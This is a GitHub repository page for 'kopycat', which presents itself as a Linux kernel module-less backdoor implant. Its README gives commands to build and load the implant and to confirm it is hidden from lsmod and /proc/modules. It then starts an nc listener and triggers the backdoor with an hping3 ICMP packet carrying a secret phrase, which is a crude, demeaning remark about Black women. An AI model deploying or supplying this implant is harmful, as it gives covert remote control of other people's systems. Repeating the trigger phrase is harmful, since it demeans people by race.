Skip to content

EgeBalci/kopycat

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

0

KOPYCAT - Linux Kernel module-less implant (backdoor)

Usage

$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat

Launch nc listener:

$ nc -l 6666

Trigger the backdoor by sending ICMP packet with secret phrase:

$ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1

Author

Ilya V. Matveychikov

2021

About

Linux Kernel module-less implant (backdoor)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 79.2%
  • Makefile 14.0%
  • Nix 4.1%
  • Shell 2.7%